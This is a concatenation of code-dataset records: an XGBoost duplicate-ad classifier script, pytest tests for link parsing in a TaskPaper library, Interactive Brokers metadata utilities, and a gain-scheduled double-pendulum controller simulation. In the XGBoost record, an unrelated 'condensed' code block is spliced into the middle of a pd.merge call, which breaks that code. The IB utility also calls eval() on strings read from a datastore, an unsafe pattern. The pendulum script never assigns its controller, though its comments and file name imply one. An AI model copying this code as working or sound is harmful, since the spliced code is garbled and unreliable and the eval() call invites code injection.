ETA: {}, MAX_DEPTH: {}, SUBSAMPLE: {}, \\\n COLSAMPLE_BY_TREE: {}'.format(\n eta, max_depth, subsample, colsample_bytree)\n )\n params = {\n \"objective\": \"binary:logistic\",\n \"booster\": \"gbtree\",\n \"eval_metric\": \"auc\",\n \"eta\": eta,\n \"max_depth\": max_depth,\n \"subsample\": subsample,\n \"colsample_bytree\": colsample_bytree,\n \"silent\": 1,\n \"seed\": random_state\n }\n num_boost_round = 260\n early_stopping_rounds = 20\n test_size = 0.1\n\n X_train, X_valid = train_test_split(\n train, test_size=test_size, random_state=random_state\n )\n y_train = X_train[target]\n y_valid = X_valid[target]\n dtrain = xgb.DMatrix(X_train[features], y_train)\n dvalid = xgb.DMatrix(X_valid[features], y_valid)\n\n watchlist = [(dtrain, 'train'), (dvalid, 'eval')]\n gbm = xgb.train(params, dtrain, num_boost_round, evals=watchlist,\n early_stopping_rounds=early_stopping_rounds,\n verbose_eval=True)\n\n print(\"Validating...\")\n check = gbm.predict(\n xgb.DMatrix(X_valid[features]), ntree_limit=gbm.best_ntree_limit\n )\n score = roc_auc_score(X_valid[target].values, check)\n print('Check error value: {:.6f}'.format(score))\n\n imp = self._get_importance(gbm, features)\n print('Importance array: ', imp)\n\n print(\"Predict test set...\")\n test_prediction = gbm.predict(\n xgb.DMatrix(test[features]), ntree_limit=gbm.best_ntree_limit\n )\n took_time = round((time.time() - start_time)/60, 2)\n print('Training time: {} minutes'.format(took_time))\n return test_prediction.tolist(), score\n\n\ndef create_submission(score, test, prediction):\n now = datetime.datetime.now()\n now_str = str(now.strftime(\"%Y-%m-%d-%H-%M\"))\n sub_file = 'submission_' + str(score) + '_' + now_str + '.csv'\n print('Writing submission: ', sub_file)\n with open(sub_file, 'w') as f:\n f.write('id,probability\\n')\n total = 0\n for id in test['id']:\n str1 = str(id) + ',' + str(prediction[total])\n str1 += '\\n'\n total += 1\n f.write(str1)\n\n\ndef intersect(a, b):\n return list(set(a) & set(b))\n\n\ndef get_features(train, test):\n trainval = list(train.columns.values)\n testval = list(test.columns.values)\n output = intersect(trainval, testval)\n output.remove('itemID_1')\n output.remove('itemID_2')\n return output\n\n\nclass DataLoader:\n def __init__(self, data_dir, item_pairs_fname, item_info_fname,\n location_fname, category_fname):\n self.data_dir = data_dir\n self.item_pairs_fname = data_dir + item_pairs_fname\n self.item_info_fname = data_dir + item_info_fname\n self.location_fname = data_dir + location_fname\n self.category_fname = data_dir + category_fname\n\n def _load_data_with(self, types1, types2):\n print(\"Load \"+self.item_pairs_fname)\n pairs = pd.read_csv(self.item_pairs_fname, dtype=types1)\n print(\"Load \"+self.item_info_fname)\n items = pd.read_csv(self.item_info_fname, dtype=types2)\n items.fillna(-1, inplace=True)\n location = pd.read_csv(self.location_fname)\n category = pd.read_csv(self.category_fname)\n return pairs, items, location, category\n\n def _add_text_features(self, items):\n print('Add text features...')\n items['len_title'] = items['title'].str.len()\n items['len_description'] = items['description'].str.len()\n items['len_attrsJSON'] = items['attrsJSON'].str.len()\n return items\n\n def _merge_items(self, train, items, category, location):\n for i in ['1', '2']:\n print('Merge item {}...'.format(i))\n item = items[\n ['itemID', 'categoryID', 'price', 'locationID', 'metroID',\n 'lat', 'lon', 'len_title', 'len_description', 'len_attrsJSON']\n ]\n item = pd.merge(\n item, category, 
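# Condensed, self-contained version of the train/validate flow in
# run_test() above, on synthetic data. It uses the same (older) xgboost
# API this script targets, where best_ntree_limit/ntree_limit exist:
import numpy as np
import xgboost as xgb

X = np.random.rand(1000, 5)
y = (X[:, 0] + X[:, 1] > 1.0).astype(int)
dtrain = xgb.DMatrix(X[:900], label=y[:900])
dvalid = xgb.DMatrix(X[900:], label=y[900:])
params = {'objective': 'binary:logistic', 'eval_metric': 'auc', 'eta': 0.1}
gbm = xgb.train(params, dtrain, num_boost_round=200,
                evals=[(dtrain, 'train'), (dvalid, 'eval')],
                early_stopping_rounds=20, verbose_eval=False)
pred = gbm.predict(dvalid, ntree_limit=gbm.best_ntree_limit)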
how='left', on='categoryID', left_index=True\n )\n item = pd.merge(\n item, location, how='left', on='locationID', left_index=True\n )\n item = item.rename(\n columns={\n 'itemID': 'itemID_' + i,\n 'categoryID': 'categoryID_' + i,\n 'parentCategoryID': 'parentCategoryID_' + i,\n 'price': 'price_' + i,\n 'locationID': 'locationID_' + i,\n 'regionID': 'regionID_' + i,\n 'metroID': 'metroID_' + i,\n 'lat': 'lat_' + i,\n 'lon': 'lon_' + i,\n 'len_title': 'len_title_' + i,\n 'len_description': 'len_description_' + i,\n 'len_attrsJSON': 'len_attrsJSON_' + i,\n }\n )\n train = pd.merge(\n train, item, how='left', on='itemID_'+i, left_index=True\n )\n return train\n\n def _create_same_arrays(self, train):\n print('Create same arrays')\n train['price_same'] = np.equal(\n train['price_1'], train['price_2']).astype(np.int32)\n train['locationID_same'] = np.equal(\n train['locationID_1'], train['locationID_2']).astype(np.int32)\n train['categoryID_same'] = np.equal(\n train['categoryID_1'], train['categoryID_2']).astype(np.int32)\n train['regionID_same'] = np.equal(\n train['regionID_1'], train['regionID_2']).astype(np.int32)\n train['metroID_same'] = np.equal(\n train['metroID_1'], train['metroID_2']).astype(np.int32)\n train['lat_same'] = np.equal(\n train['lat_1'], train['lat_2']).astype(np.int32)\n train['lon_same'] = np.equal(\n train['lon_1'], train['lon_2']).astype(np.int32)\n return train\n\n def _prep_data(self, pairs, items, category, location):\n items = self._add_text_features(items)\n data = self._merge_items(pairs, items, category, location)\n data = self._create_same_arrays(data)\n return data\n\n def get_types_2(self):\n return {\n 'itemID': np.dtype(int),\n 'categoryID': np.dtype(int),\n 'title': np.dtype(str),\n 'description': np.dtype(str),\n 'images_array': np.dtype(str),\n 'attrsJSON': np.dtype(str),\n 'price': np.dtype(float),\n 'locationID': np.dtype(int),\n 'metroID': np.dtype(float),\n 'lat': np.dtype(float),\n 'lon': np.dtype(float),\n }\n\n def _get_data_types(self):\n return self.get_types_1(), self.get_types_2()\n\n def get_types_1(self):\n raise NotImplementedError(\"Subclasses should implement this.\")\n\n def prepare(self):\n raise NotImplementedError(\"Subclasses should implement this.\")\n\n\nclass TrainDataLoader(DataLoader):\n def get_types_1(self):\n return {\n 'itemID_1': np.dtype(int),\n 'itemID_2': np.dtype(int),\n 'isDuplicate': np.dtype(int),\n 'generationMethod': np.dtype(int),\n }\n\n def prepare(self):\n start_time = time.time()\n types1, types2 = self._get_data_types()\n pairs, items, location, category = self._load_data_with(types1, types2)\n train = self._prep_data(pairs, items, category, location)\n train = train.drop(['generationMethod'], axis=1)\n print('Create train data time: {} seconds'.format(\n round(time.time() - start_time, 2))\n )\n train.fillna(-1, inplace=True)\n return train\n\n\nclass TestDataLoader(DataLoader):\n def get_types_1(self):\n return {\n 'itemID_1': np.dtype(int),\n 'itemID_2': np.dtype(int),\n 'id': np.dtype(int),\n }\n\n def prepare(self):\n start_time = time.time()\n types1, types2 = self._get_data_types()\n pairs, items, location, category = self._load_data_with(types1, types2)\n test = self._prep_data(pairs, items, category, location)\n print('Create test data time: {} seconds'.format(\n round(time.time() - start_time, 2))\n )\n test.fillna(-1, inplace=True)\n return test\n\n\ndef read_test_train():\n data_dir = \"../input/\"\n train_item_pairs_fname = 'ItemPairs_train.csv'\n train_item_info_fname = 'ItemInfo_train.csv'\n 
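# the Location.csv and Category.csv lookup tables below are shared by the train and test loaders\n 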
test_item_pairs_fname = 'ItemPairs_test.csv'\n test_item_info_fname = 'ItemInfo_test.csv'\n location_fname = 'Location.csv'\n category_fname = 'Category.csv'\n train = TrainDataLoader(\n data_dir, train_item_pairs_fname, train_item_info_fname,\n location_fname, category_fname\n ).prepare()\n test = TestDataLoader(\n data_dir, test_item_pairs_fname, test_item_info_fname,\n location_fname, category_fname\n ).prepare()\n # Get only subset of data\n len_old = len(train.index)\n train = train.sample(frac=0.5)\n len_new = len(train.index)\n print('Reduce train from {} to {}'.format(len_old, len_new))\n features = get_features(train, test)\n return train, test, features\n\n\nclass Predictor:\n def __init__(self, algorithm, train, test, features, target_field):\n self.algorithm = algorithm\n self.train = train\n self.test = test\n self.features = features\n self.target_field = target_field\n\n def predict(self):\n if self.algorithm == 'xgboost':\n return XGBooster().run_test(\n self.train, self.test, self.features, self.target_field\n )\n # Plug in alternative algs\n raise NotImplementedError(\"Unknown algorithm.\")\n\n\nif __name__ == '__main__':\n train, test, features = read_test_train()\n print('Length of train: ', len(train))\n print('Length of test: ', len(test))\n print('Features [{}]: {}'.format(len(features), sorted(features)))\n test_prediction, score = Predictor(\n 'xgboost', train, test, features, 'isDuplicate'\n ).predict()\n print('Real score = {}'.format(score))\n create_submission(score, test, test_prediction)\n","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":11517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"549917550","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\"\"\"\nThis file contains some methods for testing the way we handle links.\nCompared to tags, this code is fairly simple.\n\"\"\"\n\nimport pytest\n\nfrom taskpaper import TaskPaperItem\n\n\n@pytest.mark.parametrize('item_text,links', [\n # Example with no tags\n ['lorem ipsum', []],\n\n # Example with an email address at the end of the item\n ['hello example@example.org', ['example@example.org']],\n\n # Example with a web address at the end of the item\n ['foo http://google.co.uk', ['http://google.co.uk']],\n\n # Example with a web address in the middle of the item\n ['quick ftp://brownfox.com jumps', ['ftp://brownfox.com']],\n\n # Example with a local file path\n ['opening ./myfile.txt', ['./myfile.txt']],\n\n # Example with a web address and an email address\n ['send http://book.org to library@example.net', ['http://book.org', 'library@example.net']]\n])\ndef test_link_parsing(item_text, links):\n \"\"\"\n Create some items which contain links, and check the links are\n recognised correctly.\n \"\"\"\n item = TaskPaperItem(item_text)\n assert item.links == links\n\n\n@pytest.mark.parametrize('bad_link', [\n 'notalink',\n 'http//missingcolon.com',\n 'example-at-example-dot-org',\n 'http://example.org and some text'\n])\ndef test_adding_bad_links_is_rejected(bad_link):\n \"\"\"\n Trying to add something that isn't a link to the list of links is an\n error.\n \"\"\"\n item = TaskPaperItem('An item without any links')\n with pytest.raises(ValueError):\n item.links.append(bad_link)\n\n\n@pytest.mark.parametrize('good_link', [\n 'http://google.co.uk',\n 'ftp://sekrit.org',\n 'john@smith.com',\n])\ndef test_link_mutation(good_link):\n \"\"\"\n Add a link to an item, check it's allowed, check it shows up correctly.\n 
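For example, appending 'http://google.co.uk' should leave item.links == ['http://google.co.uk'].\n 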
\"\"\"\n item = TaskPaperItem('Another item without any links')\n\n item.links.append(good_link)\n assert len(item.links) == 1\n assert item.links == [good_link]\n\n\n# def test_tag_mutation():\n# \"\"\"\n# Create an item, add some tags, remove some tags, check that the correct\n# state is preserved throughout.\n# \"\"\"\n# item = TaskPaperItem('I am a test')\n#\n# # Start by adding a series of tags\n# item.add_tag('hello')\n# item.add_tag(name='foo', value='bar')\n# item.add_tag(name='company', value='hogbay software')\n# item.add_tag(name='foo', value='baz')\n# print(item.tags)\n# assert item.tags == [\n# ('hello', ''),\n# ('foo', 'bar'),\n# ('company', 'hogbay software'),\n# ('foo', 'baz'),\n# ]\n#\n# # Remove a tag by name only. Check that all tags with this name are\n# # removed.\n# item.remove_tag(name='foo')\n# assert item.tags == [\n# ('hello', ''),\n# ('company', 'hogbay software'),\n# ]\n#\n# # Remove a tag, specifying both the name and value. Make sure that\n# # only this tag is removed.\n# item.add_tag(name='company', value='apple inc')\n# item.remove_tag(name='company', value='hogbay software')\n# assert item.tags == [\n# ('hello', ''),\n# ('company', 'apple inc'),\n# ]\n#\n# # Using the set_tag method correctly updates the value of an\n# # existing tag\n# item.set_tag(name='hello', value='new_value')\n# assert item.tags == [\n# ('hello', 'new_value'),\n# ('company', 'apple inc'),\n# ]\n#\n# # Using the set_tag method will create a new tag if the name doesn't\n# # already exist\n# item.set_tag(name='blue', value='aquamarine')\n# assert item.tags == [\n# ('hello', 'new_value'),\n# ('company', 'apple inc'),\n# ('blue', 'aquamarine'),\n# ]\n#\n# def test_tag_inclusion():\n# \"\"\"\n# Create some tags, check they are correctly recognised as being part\n# of the tag list.\n# \"\"\"\n# item = TaskPaperItem('I am a test @hello(world) @foo(bar) @baz')\n#\n# # Check that if we only specify the name of the tag, we get the\n# # correct result.\n# for tag_name in ['hello', 'foo', 'baz']:\n# assert tag_name in item.tags\n# assert 'lorem' not in item.tags\n#\n# # Check that if we specify a name and a value, we get the same\n# # result.\n# assert ('hello', 'world') in item.tags\n# assert ('foo', 'bar') in item.tags\n# assert ('lorem', 'ipsum') not in item.tags\n#\n# # Check that nonsense objects are not in the list of tags\n# assert 47 not in item.tags\n# assert float('inf') not in item.tags\n# assert TaskPaperItem('tomato soup') not in item.tags\n#\n#\n# def test_matching_tag_at_end_of_item_string():\n# \"\"\"\n# Test that a tag at the end of an item is found correctly.\n# \"\"\"\n# item = TaskPaperItem('Tag is right at the end @hello')\n# assert item.tags == [('hello', '')]\n#\n# item2 = TaskPaperItem('Another item right at the end @hello(world)')\n# assert item2.tags == [('hello', 'world')]\n#\n#\n# def test_matching_tag_at_start_of_item_string():\n# \"\"\"\n# Test that a tag at the start of an item is found correctly.\n# \"\"\"\n# item = TaskPaperItem('@hello Tag is at the very start')\n# assert item.tags == [('hello', '')]\n#\n# item2 = TaskPaperItem('@hello(world) Another tag right at the start')\n# assert item2.tags == [('hello', 'world')]\n#\n#\n# @pytest.mark.parametrize('bad_tag_name', [\n# 47,\n# float('inf'),\n# TaskPaperItem('tomato soup'),\n# ])\n# def test_adding_bad_tag_names_is_rejected(bad_tag_name):\n# \"\"\"\n# If we try to add a bad tag name to an item, we get a ValueError.\n# \"\"\"\n# item = TaskPaperItem('I am a test @hello(world) @foo(bar) @baz')\n# with 
pytest.raises(ValueError):\n# item.add_tag(bad_tag_name)\n#\n#\n# @pytest.mark.parametrize('bad_bool', [\n# 42,\n# float('nan'),\n# 'cabbage',\n# 'strawberry custard',\n# 1 + 2j,\n# ])\n# def test_setting_done_to_non_bool_is_error(bad_bool):\n# \"\"\"\n# Trying to set the done status of an item to anything but True/False\n# is an error.\n# \"\"\"\n# item = TaskPaperItem('I am an unfinished item.')\n# with pytest.raises(ValueError):\n# item.done = bad_bool\n#\n#\n# @given(taglist_strategy())\n# def test_creating_two_items_with_the_same_tags_gives_equal_tag_lists(taglist):\n# \"\"\"\n# Two items given the same tags have equal tag lists.\n# \"\"\"\n# item1 = TaskPaperItem('I am a test')\n# item2 = TaskPaperItem('A different test')\n#\n# for t in taglist:\n# item1.add_tag(*t)\n# item2.add_tag(*t)\n#\n# assert item1.tags == item2.tags\n#\n#\n# @pytest.mark.parametrize('bad_item_string', [\n# 'hello world @tag)',\n# 'hello world @tag())',\n# 'hello world @tag(value)a',\n# ])\n# def test_tag_followed_by_nonsense_char_is_ignored(bad_item_string):\n# \"\"\"\n# A tag value followed by spurious parens isn't matched. These examples\n# are obtained by experimenting with TaskPaper to see what it matches\n# as a tag.\n# \"\"\"\n# item = TaskPaperItem(bad_item_string)\n# assert item.tags == []\n#\n#\n# # TOOD: Swap this out for suppress_health_checks.\n# @settings(perform_health_check=False)\n# @given(taglist_strategy())\n# def test_shuffling_tag_list_doesnt_affect_equality(taglist):\n# \"\"\"\n# Tag lists are equal, modulo shuffling.\n# \"\"\"\n# item1 = TaskPaperItem('I am a new test')\n# item2 = TaskPaperItem('Another different test')\n#\n# for t in taglist:\n# item1.add_tag(*t)\n# item2.add_tag(*t)\n#\n# # Shuffle the tags on item1, and check the tag lists remain equal.\n# random.shuffle(item1.tags)\n# assert item1.tags == item2.tags\n#\n#\n# @given(taglist_strategy(), taglist_strategy())\n# def test_different_taglists_of_different_lengths_are_unequal(list1, list2):\n# \"\"\"\n# If two lists of tags have different length, they are never equal.\n# \"\"\"\n# assume(len(list1) != len(list2))\n# item1 = TaskPaperItem('I am a new test')\n# item2 = TaskPaperItem('Another different test')\n#\n# for t in list1:\n# item1.add_tag(*t)\n# for t in list2:\n# item2.add_tag(*t)\n#\n# assert item1.tags != item2.tags\n#\n#\n# @given(taglist_strategy())\n# def test_round_trip_of_tag_items(taglist):\n# \"\"\"\n# Casting an item with some tags to a string and back gets the same tags.\n# \"\"\"\n# item = TaskPaperItem(\"I have no tags\")\n# assert item.tags == []\n#\n# for t in taglist:\n# item.add_tag(*t)\n#\n# item_str = str(item)\n# new_item = TaskPaperItem(item_str)\n#\n# assert new_item.tags == taglist\n","sub_path":"tests/_test_links.py","file_name":"_test_links.py","file_ext":"py","file_size_in_byte":8508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"57023980","text":"from typing import Optional, Union, List\nfrom pathlib import Path\nfrom os import makedirs, path\n\nimport numpy as np\nfrom ib_insync import IB, ContFuture, MarketOrder, Future\nfrom logbook import Logger\n\nfrom datastore import AbstractBaseStore\n\n\nlog = Logger(__name__)\n\n\ndef update_details(ib: IB, store: AbstractBaseStore,\n keys: Optional[Union[str, List[str]]] = None) -> None:\n \"\"\"\n Pull contract details from ib and update metadata in store.\n\n Args:\n ib: connected IB instance\n store: datastore instance, for which data will be updated\n keys (Optional): keys in datastore, 
for which data is to be updated,\n if not given, update all keys\n \"\"\"\n if keys is None:\n keys = store.keys()\n elif isinstance(keys, str):\n keys = [keys]\n\n contracts = {}\n for key in keys:\n try:\n contract = eval(store.read_metadata(key)['repr'])\n except TypeError:\n log.error(f'Metadata missing for {key}')\n continue\n contract.update(includeExpired=True)\n contracts[key] = contract\n ib.qualifyContracts(*contracts.values())\n details = {}\n for k, v in contracts.copy().items():\n try:\n details[k] = ib.reqContractDetails(v)[0]\n except IndexError:\n log.error(f'Contract unavailable: {k}')\n del contracts[k]\n\n # get commission levels\n order = MarketOrder('BUY', 1)\n commissions = {}\n for k, v in contracts.items():\n try:\n commissions[k] = ib.whatIfOrder(v, order).commission\n except AttributeError:\n log.error(f'Commission unavailable for: {k}')\n commissions[k] = np.nan\n\n for c, d in details.items():\n _d = {'name': d.longName,\n 'min_tick': d.minTick,\n 'commission': commissions[c]\n }\n store.write_metadata(c, _d)\n\n log.info('Data written to store.')\n\n\ndef default_path(*dirnames: str) -> str:\n \"\"\"\n Return the path created by joining ~/ib_data/ and all dirnames in turn.\n If the path doesn't exist create it.\n Should also work in Windows but not tested.\n \"\"\"\n # joining dirnames with ' / ' built one bogus component, so the existence\n # check never matched the directory that makedirs actually created\n target = Path.home().joinpath('ib_data', *dirnames)\n if not target.exists():\n makedirs(target)\n return str(target)\n","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"269057219","text":"from numpy import array, zeros, eye, asarray, dot, rad2deg, deg2rad, linspace, sin, cos, pi\nfrom numpy.linalg import inv\nfrom matplotlib.pyplot import plot, xlabel, ylabel, legend, rcParams\nfrom sympy import symbols, simplify, trigsimp\nfrom sympy.physics.mechanics import dynamicsymbols, ReferenceFrame, Point, inertia, RigidBody, KanesMethod\nfrom sympy.physics.vector import init_vprinting, vlatex\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.integrate as integrate\nfrom scipy.integrate import odeint\nfrom scipy.linalg import solve_continuous_are\nfrom pydy.codegen.code import generate_ode_function\nimport pickle\nimport matplotlib.animation as animation\nfrom double_pendulum_setup import theta1, theta2, ankle, leg_length, waist, omega1, omega2, ankle_torque, waist_torque, coordinates, speeds, kane, mass_matrix, forcing_vector, specified, parameter_dict, constants, numerical_constants, numerical_specified, leg, body, ke_body\n# NOTE: leg, body and ke_body are needed by the energy bookkeeping below; they are assumed to be exported by double_pendulum_setup\n\n#from utils import controllable\n\ninit_vprinting()\nrcParams['figure.figsize'] = (14.0, 6.0)\n\nright_hand_side = generate_ode_function(mass_matrix, forcing_vector,\n constants,\n coordinates, speeds, specified)\n\n#Initial Conditions for speeds and positions\nx0 = zeros(4)\nx0[0] = deg2rad(2.0)\nx0[1] = deg2rad(-2.0)\n\nargs = {'constants': numerical_constants,\n 'specified': numerical_specified}\n\nframes_per_sec = 60\nfinal_time = 5.0\n\nt = linspace(0.0, final_time, final_time*frames_per_sec)\n\nright_hand_side(x0, 0.0, args)\n\ntorque_vector = []\ntime_vector = []\n\ninputK = open('double_pen_LQR_K_robot.pkl','rb')\ninputa1 = open('double_pen_angle_1_zoom.pkl','rb')\ninputa2 = open('double_pen_angle_2_zoom.pkl','rb')\ninputtor = open('double_pen_equil_torques_zoom.pkl','rb')\n\nK = pickle.load(inputK)\nangle_1 = pickle.load(inputa1)\nangle_1 
= np.asarray(angle_1, dtype = float)\nangle_2 = pickle.load(inputa2)\ntorques = pickle.load(inputtor)\n\ninputK.close()\ninputa1.close()\ninputa2.close()\ninputtor.close()\nlasttime = 0.0\nlastk = []\nlasttor = 0.0\nidx_vector = []\nlastidx = 0\ncounter = 0\ntracking_vector = []\ncurr_vector = []\n\ndef stay_controller(x,t):\n global lastidx\n global counter\n torquelim = 200\n if(counter == 0):\n lastidx = np.abs(angle_1 - x[0]).argmin()\n counter = counter + 1\n print(\"first round\")\n print(lastidx)\n if(x[3] < 1 and x[3] > -1):\n# idx = (np.abs(angle_1 - x[0])).argmin()\n# lastidx = idx\n idx = lastidx\n idx_vector.append(lastidx)\n print(idx)\n else:\n idx = (np.abs(angle_1 - x[0])).argmin()\n lastidx = idx\n idx_vector.append(idx)\n print(idx)\n returnval = -dot(K[idx], x)\n if(returnval[1] > torquelim):\n returnval[1] = torquelim\n if(returnval[1] < -1*torquelim):\n returnval[1] = -1*torquelim\n if(x[0] > 0.22):\n #returnval[0] = 1000*(0.21 - x[0])\n #if(returnval[0] < -100):\n # returnval[0] = -100\n returnval[1] = 0\n if(x[0] < -0.22):\n #returnval[0] = -1000*(x[0] + 0.21) \n #if(returnval[0] > 100):\n # returnval[0] = 100\n returnval[1] = 0\n torque_vector.append(returnval)\n time_vector.append(t)\n if(t < 1.25 and t > 1):\n returnval[0] = -40\n tracking_vector.append([angle_1[idx], angle_2[idx]])\n curr_vector.append([x[0], x[1]])\n return returnval\n\ndef zero_controller(x,t):\n global lastidx\n global counter\n torquelim = 200\n if(counter == 0):\n lastidx = np.abs(angle_1 - x[0]).argmin()\n counter = counter + 1\n idx = lastidx\n returnval = -dot(K[lastidx],x)\n print(\"first round\")\n print(lastidx)\n if(x[2] < 0.2 and x[2] > -0.2):\n idx = (np.abs(angle_1 - x[0])).argmin()\n if((idx + 5) > 91):\n idx = idx - 4\n if((idx - 5) < 91):\n idx = idx + 4\n lastidx = idx\n returnval = -dot(K[idx], x)\n idx_vector.append(lastidx)\n print(idx)\n else:\n idx = lastidx\n idx_vector.append(lastidx)\n returnval = -dot(K[idx], x)\n tracking_vector.append([angle_1[idx], angle_2[idx]])\n curr_vector.append([x[0], x[1]])\n if(returnval[1] > torquelim):\n returnval[1] = torquelim\n if(returnval[1] < -1*torquelim):\n returnval[1] = -1*torquelim\n if(x[0] > 0.22):\n #returnval[0] = 1000*(0.21 - x[0])\n #if(returnval[0] < -100):\n # returnval[0] = -100\n returnval[1] = 0\n if(x[0] < -0.22):\n #returnval[0] = -1000*(x[0] + 0.21) \n #if(returnval[0] > 100):\n # returnval[0] = 100\n returnval[1] = 0\n if(t > 0.5 and t < 2.00):\n returnval[0] = 4\n returnval[1] = returnval[1] - 4\n# if(t > 1.0 and t < 1.15):\n# returnval[0] = 10\n# if(t > 1.3 and t < 1.45):\n# returnval[0] = 10\n# if(t > 1.7 and t < 1.85):\n# returnval[0] = 10\n\n torque_vector.append(returnval)\n time_vector.append(t)\n return returnval\n\ndef path_controller(x,t):\n global lastidx\n global counter\n torquelim = 200\n if(counter == 0):\n lastidx = np.abs(angle_1 - x[0]).argmin()\n counter = counter + 1\n returnval = -dot(K[lastidx], x)\n print(\"first round\")\n print(lastidx)\n if(x[2] < 0.5 and x[2] > -.5):\n if(lastidx > 0 and counter%50 ==0):\n lastidx = lastidx - 2\n print(\"i am slow\")\n print(lastidx)\n returnval = -dot(K[lastidx], x)\n idx_vector.append(lastidx)\n else:\n idx = (np.abs(angle_1 - x[0])).argmin()\n lastidx = idx\n idx_vector.append(lastidx)\n returnval = -dot(K[idx], x)\n print(idx)\n tracking_vector.append([angle_1[lastidx], angle_2[lastidx]])\n counter = counter + 1\n curr_vector.append([x[0], x[1]])\n if(returnval[1] > torquelim):\n returnval[1] = torquelim\n if(returnval[1] < -1*torquelim):\n 
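# clamp the waist torque to the +/-torquelim bound set above before applying it\n 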
returnval[1] = -1*torquelim\n if(x[0] > 0.22):\n #returnval[0] = 1000*(0.21 - x[0])\n #if(returnval[0] < -100):\n # returnval[0] = -100\n returnval[1] = 0\n if(x[0] < -0.22):\n #returnval[0] = -1000*(x[0] + 0.21) \n #if(returnval[0] > 100):\n # returnval[0] = 100\n returnval[1] = 0\n \n torque_vector.append(returnval)\n time_vector.append(t)\n return returnval\n\n\ndef lqr_controller(x,t):\n global lastk\n if(t==0):\n idx = np.abs(angle_1 - x[0]).argmin()\n print(idx)\n lastk = K[idx]\n returnval = -dot(lastk,x)\n #if(x[0] > 0.21):\n # returnval[0] = 1000*(0.21 - x[0])\n #if(x[0] < 0.21):\n # returnval[0] = -1000*(x[0]+0.21) \n returnval[0] = 500*(x0[0]-x[0])\n torque_vector.append(returnval)\n time_vector.append(t)\n return returnval\n \ndef pid_controller(x,t):\n diff = [x0[0] - x[0], x0[1] - x[1]]\n diff[1] = diff[1]+diff[0]\n diff[0]=0\n torque_vector.append(diff)\n time_vector.append(t)\n return -100*diff\n\ndef local_controller(x,t):\n idx = np.abs(angle_1 - x[0]).argmin()\n gainK = K[idx]\n returnval = -dot(gainK,x)\n if(returnval[1] > 300):\n returnval[1] = 300\n if(returnval[1] < -300):\n returnval[1] = -300\n torque_vector.append(returnval)\n time_vector.append(t)\n return returnval\ndef trim_controller(x,t):\n idx = np.abs(angle_1 - x[0]).argmin()\n return [0, torques[idx]]\n\n#args['specified'] = test_controller\n\ny = odeint(right_hand_side, x0, t, args=(args,))\n\nx1 = numerical_constants[0]*sin(y[:,0])\ny1 = numerical_constants[0]*cos(y[:,0])\n\nx2 = x1 + numerical_constants[4]*sin(y[:,0] + y[:,1])\ny2 = y1 + numerical_constants[4]*cos(y[:,0] + y[:,1])\n\np_energy_vector = []\nk_energy_vector = []\ntot_ke = []\ntot_pe = []\n\nfor i in y[:,:2]:\n coord_dict = dict(zip(coordinates, i))\n p_energy = (leg.potential_energy.subs(coord_dict).subs(parameter_dict), body.potential_energy.subs(coord_dict).subs(parameter_dict))\n p_energy_vector.append(p_energy)\n tot_pe.append(p_energy[0] + p_energy[1])\n\nfor p,s in zip(y[:,:2], y[:,2:]):\n speeds_dict = dict(zip(speeds,s))\n coords_dict = dict(zip(coordinates, p))\n tot_ke.append(ke_body.subs(speeds_dict).subs(coords_dict).subs(parameter_dict))\n\ntot_e = []\nfor i, j in zip(tot_ke, tot_pe):\n tot_e.append(i+j)\n\ndt = 0.05\n\nfig = plt.figure()\nax = fig.add_subplot(111, autoscale_on=False,aspect='equal', xlim = (-2, 2), ylim = (-2, 2))\nax.grid()\n\nline, = ax.plot([], [], 'o-', lw=2)\ntime_template = 'time=%.1fs'\ntime_text = ax.text(0.05, 0.9, '', transform=ax.transAxes)\n\ndef init():\n line.set_data([],[])\n time_text.set_text('')\n return line, time_text\n\ndef animate(i):\n thisx = [0, x1[i], x2[i]]\n thisy = [0, y1[i], y2[i]]\n\n line.set_data(thisx, thisy)\n time_text.set_text(time_template%(i*dt))\n return line, time_text\n\nani = animation.FuncAnimation(fig, animate, np.arange(1, len(y)), interval=25, blit=True, init_func=init)\nani.save('acrobot_zeroc_0_0_disturbance_initial_K.mp4')\nplt.show()\n\nf, (ax1, ax2, ax3) = plt.subplots(3)\n\nke1, ke2 = dynamicsymbols('ke1, ke2')\npe1, pe2 = dynamicsymbols('pe1, pe2')\nke, pe,tot = dynamicsymbols('ke, pe, tot')\n\nenergies = [pe1,pe2,ke1,ke2]\nenergy = [pe, ke, tot]\n\n\n\n\nax1.plot(t, rad2deg(y[:,:2]))\nax1.set_xlabel('Time [s]')\nax1.set_ylabel('Angle[deg]')\nax1.legend([\"${}$\".format(vlatex(c)) for c in coordinates])\n\"\"\"\nplot(time_vector, tracking_vector)\n#plot(time_vector, curr_vector)\nxlabel('Time')\nylabel('angle')\nplt.show()\n\nplot(time_vector, torque_vector)\nxlabel('Time [s]')\nylabel('Angle 1 torque')\nplt.show()\n\"\"\"\nax2.plot(t, rad2deg(y[:, 
2:]))\nax2.set_xlabel('Time [s]')\nax2.set_ylabel('Angular Rate [deg/s]')\nax2.legend([\"${}$\".format(vlatex(s)) for s in speeds])\n\nax3.plot(t, tot_pe)\nax3.plot(t, tot_ke)\nax3.plot(t, tot_e)\nax3.set_xlabel('Time [s]')\nax3.set_ylabel('Energy')\nax3.legend([\"${}$\".format(vlatex(e)) for e in energy])\nplt.show()\n\"\"\"\nplot(time_vector, idx_vector)\nxlabel('t')\nylabel('idx')\nplt.show()\n\"\"\"\n","sub_path":"double_pendulum/double_pendulum_controlled_gain_scheduling.py","file_name":"double_pendulum_controlled_gain_scheduling.py","file_ext":"py","file_size_in_byte":9393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
